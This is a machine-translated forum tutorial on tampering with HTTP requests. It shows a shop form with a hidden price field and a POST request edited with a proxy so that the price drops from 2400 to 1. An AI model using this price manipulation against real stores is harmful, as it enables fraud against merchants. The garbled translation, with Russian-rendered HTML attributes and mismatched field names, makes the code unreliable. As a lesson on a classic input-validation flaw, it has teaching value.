Эта статья является зеркальной статьёй машинного перевода, пожалуйста, нажмите здесь, чтобы перейти к оригиналу.

Architect_Programmer_Code Сельскохозяйственная сеть»Архитектор Другие технологии Безопасная атака и защита Проникновение вторжения: применение HTTP-заголовков
Вид: 12586|Ответ: 0

[Урок по безопасности] Проникновение вторжения: применение HTTP-заголовков

[Скопировать ссылку]
Опубликовано 07.02.2015 17:59:07 | | |

О применении HTTP-заголовков

Заголовок HTTP часто используется в механизме передачи сайтов, но большинство новичков в Китае не заметили этот элемент; эта статья посвящена только новичкам, роли заголовка HTTP в процессе вторжения.

Возьмём страницу покупок в качестве примера, чтобы проанализировать небольшую роль HTTP-заголовков.

Сначала давайте проанализируем форму на странице покупок.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<input type="скрытое" имя="price" value="449">

<input type="отправить" значение="Купить">

</form>

Во время открытия сделайте скриншот его заголовка http-сообщения и посмотрите

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

Хотя поле цены не отображается на странице при открытии страницы покупок, его всё равно можно редактировать и управлять пользователем.

Существует два способа добиться редактирования

1. Сохранить исходный код HTML для модификации, а затем загрузить его в браузер для запуска

2. Использовать прокси-перехват для изменения HTTP-заголовков (конструкция прокси в инструменте burp)

Возьмём HTTP-заголовок выше в качестве примера
До изменений
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

После смены
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

количество=1&цена=1


В последней строке стоимость поля Price составляет 2400, и если изменить её на 1, можно купить iPhone 4S по более низкой цене.

В этой статье представлены только неожиданные преимущества, такие как инъекция LDAP.




Предыдущий:Метод реализации пароля восстановления MySQL забыл
Следующий:SQL-инъекция для получения полного пути к веб-сайту

Связанные публикации
Отказ:
Всё программное обеспечение, программные материалы или статьи, публикуемые Code Farmer Network, предназначены исключительно для учебных и исследовательских целей; Вышеуказанный контент не должен использоваться в коммерческих или незаконных целях, иначе пользователи несут все последствия. Информация на этом сайте взята из Интернета, и споры по авторским правам не имеют отношения к этому сайту. Вы должны полностью удалить вышеуказанный контент с компьютера в течение 24 часов после загрузки. Если вам нравится программа, пожалуйста, поддержите подлинное программное обеспечение, купите регистрацию и получите лучшие подлинные услуги. Если есть нарушение, пожалуйста, свяжитесь с нами по электронной почте.
Mail To:help@itsvse.com